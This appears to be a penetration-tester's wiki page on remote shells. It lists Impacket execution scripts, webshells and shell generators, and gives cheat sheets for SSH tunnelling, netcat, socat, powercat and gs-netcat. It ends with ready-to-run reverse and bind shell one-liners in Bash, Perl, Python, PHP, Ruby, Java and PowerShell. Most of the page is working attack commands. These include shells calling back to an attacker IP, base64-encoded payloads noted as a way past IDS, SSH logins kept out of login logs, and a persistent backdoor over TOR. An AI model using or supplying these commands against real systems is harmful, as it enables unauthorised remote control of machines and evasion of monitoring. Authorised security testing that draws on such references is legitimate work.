Shells

Shell Guides and Resources

Shells

Shell Collections
  • Impacket remote execution scripts

    • psexec.py: PSEXEC like functionality example using RemComSvc

    • smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.

    • atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

    • wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.

    • dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.

  • BlackArch Web Shells - Shell collection included in the BlackArch Linux Distrobution

  • Python PTY shells - Collection of full PTY shells in python

  • Operator Handbook: Reverse Shells - pg. 267

Misc Shells and Tools
  • dbd - dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.

  • sbd - sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.

  • Reverse Shell and Post Exploitation tool - RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.

  • Reverse Shell Generator - Cheater tool to generate reverse shell one liners

  • ShellPop - With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.

  • SQL webshell - Webshell that can run command line actions on the target as well as interact with an MSSQL database on the target.

  • Shellerator - Simple CLI tool for the generation of bind and reverse shells in multiple languages

  • donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters

  • ibombshell - This package contains a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation).

  • Weevly webshell - Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.

  • PyShell - Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server.

  • SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications

SSH
  • Basic Use: #ssh [user]@[host]

  • Use a specific key and port: #ssh -i ~/.ssh/id_rsa -p [port] [user]@[host]

  • SOCKS proxy: ssh -D8080 [user]@[host]

  • Execute a one line command : ssh -i ~/.ssh/id_rsa [user]@[host] “command string

  • Local Port Forward: ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

  • Remote Port Forward:ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

  • SSH tunnel through T1 to T2:ssh [user]@[T1 IP] -L [Local LPORT]:[T2 IP]:[T2 LPORT] -R [Local LPORT 2]:[Local IP]:[T1 LPORT]

  • Almost invisible SSH

    ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"

    This will not add your user to the /var/log/utmp file and you won't show up in w or who command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.

  • SSH tunnel OUT

    We use this all the time to circumvent local firewalls and IP filtering:

    ssh -g -L31337:1.2.3.4:80 user@server.org

    You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use gs-netcat.

  • SSH tunnel IN

    We use this to give access to a friend to an internal machine that is not on the public Internet:

    ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org

    Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use gs-netcat.

  • SSH socks4/5 OUT

    OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.

    ssh -D 1080 user@server.org

    Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through server.org and will appear with the source IP of server.org. An alternative and without the need for a server is to use gs-netcat.

  • SSH socks4/5 IN

    This is the reverse of the above example. It give others access to your local network or let others use your computer as a tunnel end-point.

    ssh -g -R 1080 user@server.org

    The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use gs-netcat.

Netcat - The original shell tool.
  • Set Listener

    • # nc -nlvp [port]

  • Connect to port

    • # nc -nv [ip] [port]

  • Push a file over netcat

    • #nc -nv [ip] [port] < /full/path/to/file.exe

  • Catch a pushed file and write it to new file

    • #nc -nvlp [port] > incoming.exe

  • Launch command upon connection

    • #nc -nlvp [port] -e cmd.exe

  • *UPGRADE Non interactive shell**

    • Check python version in /usr/bin

    • # python2.6 -c "import pty; pty.spawn('/bin/bash')"

  • Reverse shell

    • TARGET # nc [ip] [port] -e /bin/bash

    • ATTACKER # nc -n -vv -l -p [port]

  • Netcat with GAPING _SECURITY_HOLE_disabled

    • When you dont have access to the -e option (execute command after connect), backpipe commands from file system from netcat back into bin/bash

    • TARGET # mknod backpipe p && nc [ip] [port] 0<backpipe | /bin/bash 1>backpipe

    • ATTACKER # nc -n -vv -l -p [port]

  • Netcat without netcat (/dev/tcp)

    • TARGET # /bin/bash -i > /dev/tcp/[IP]/[port] 0<&1 2>&1

    • ATTACKER # nc -n -vv -l -p [port] • netcat without netcat or /dev/tcp

    • TARGET # mknod backpipe p && telnet [ip] [port] 0<backpipe | /bin/bash 1>backpipe

    • ATTACKER # nc -n -vv -l -p [port]

  • Linux listener bind shell, executes bin bash on connection

    • #mkfifo /tmp/f; nc -lvnp < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

  • Operator Handbook: Netcat - pg. 209

Socat - The upgraded and encryptable Netcat

Socat - The upgraded and encryptable Netcat

  • https://github.com/3ndG4me/socat - Socat standalone binary collection

  • Socat - establishes two bidirectional btye streams and transfers data between them

  • Bind shell - Linux connect to IP and Port

    • # socat TCP:[ip]:[port] EXEC: “bash -li”,pty,stderr,sigint,setsid,sane

  • Bind shell - Windows connect to IP and Port

    • # socat TCP:[ip]:[port] EXEC:powershell.exe,pipes

  • Sets listener on port

    • # socat TCP-L:[port]

  • Sets listener with stable shell

    • # socat TCP-L:[port] FILE:tty,raw,echo=0

  • Shares file on port

    • # socat TCP-L:[port],fork file:[file name]

  • Encrypted shell

    • Uses open ssl to create a self signed cert and encrypt

    • # openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

    • # cat shell.key shell.crt > shell.pem

    • Reverse shell

      • #sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0,FILE:tty,raw,echo=0

    • Reverse listener

      • #sudo socat OPENSSL:[ip]:[port], verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

    • Bind shell

      • #socat OPENSSL-LISTEN:,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes - Target

      • #socat OPENSSL::,verify=0 - -Attacker

Powercat - Netcat: The powershell version.

Powercat - Netcat: The powershell version. (Powershell Version 2 and Later Supported)

  • Powershell enableing

    • When presented with a User Account Control prompt, select Yes and enter Set-ExecutionPolicy Unrestricted:

  • Script we can download to a windows host to leverage Powershell and simplify shells

  • Install on linux

    • #apt install powercat

    • places in /usr/share/windows-resources/powercat

  • Set up

    • With the script on the target host, we start by using a PowerShell feature known as Dot-sourcing to load the powercat.ps1 script. This will make all variables and functions declared in the script available in the current PowerShell scope. In this way, we can use the powercat function directly in PowerShell instead of executing the script each time.

      • >. .\powercat.ps1

    • If the target machine is connected to the internet we can do the same with a remote script by once again using the handy iex cmdlet

  • Powercat file transfers

    • Set up a listener on Attackers Kali instance

      • # sudo nc -lnvp 443 > receiving_powercat.ps1

    • Invoke power cat on sending windows machine

      • > powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1

      • -c specifies client mode and sets listening address

      • -p is the destination port

      • -i indicates the local file that will be transferred remotely

  • Reverse shells

    • > powercat -c [dest ip] -p [dest port] -e cmd.exe

  • Bind shells - listener

    • > powercat -l -p [listener port] -e cmd.exe

  • Stand Alone Payloads

    • Saving the powercat functionality and given commands as a script

    • > powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

    • > ./reverseshell.ps1

    • Warning: these scripts are rather large and have hard coded strings that will set off IDS*

      • Powershell can execute Base64 encoded commands

      • We can use the -ge option when redirecting to an output file.

      • > powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

      • Due to the way powershell works, you cannot execute the new script as is but you must run its contents

      • > powershell.exe -E [encoded command string]

This package contains Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE).

Connect like there is no firewall. Securely. The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely. More on https://www.gsocket.io.

gsocket resources

The Global Socket Toolkit comes with a set of tools:

  • gsocket - Makes an existing program (behind firewall or NAT) accessible from anywhere in the world. It does so by analyzing the program and replacing the IP-Layer with its own Gsocket-Layer. A client connection to a hostname ending in '*.gsocket' then gets automatically redirected (via the GSRN) to this program.

  • gs-netcat - Netcat on steroids. Turn gs-netcat into an AES-256 encrypted reverse backdoor via TOR (optional) with a true PTY/interactive command shell (gs-netcat -s MySecret -i), integrated file-transfer, spawn a Socks4/4a/5 proxy or forward TCP connections or give somebody temporary shell access.

  • gs-sftp - sftp server & client between two firewalled workstations (gs-sftp -s MySecret)

  • gs-mount - Access and mount a remote file system (gs-mount -s MySecret ~/mnt/warez)

  • blitz - Copy data from workstation to workstation (blitz -s MySecret /usr/share/*)

  • ...many more examples and tools.

  • Reverse shell with gs-netcat

Use gs-netcat. It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :>

gs-netcat -s MySecret -l -i    # Host

Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed.

To connect to the shell from your workstation:

gs-netcat -s MySecret -i

Use -T to tunnel trough TOR.

Shell One-Liners

Shell One-Liners
  • Bash

    • bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

  • Netcat with out -e flag

    • #rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f

  • Netcat

    • #nc -e /bin/sh 10.10.10.10 4443

  • Netcat windows

    • #nc -e cmd.exe 10.10.10.10 4443

  • Perl

    • perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  • Python

    • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • PHP

    • php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

  • Ruby

    • ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

  • Java

    • r = Runtime.getRuntime()

    • p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])

    • p.waitFor()

  • Powershell - reverse shell

    • >powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

  • Powershell Bind shell

    • >powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Last updated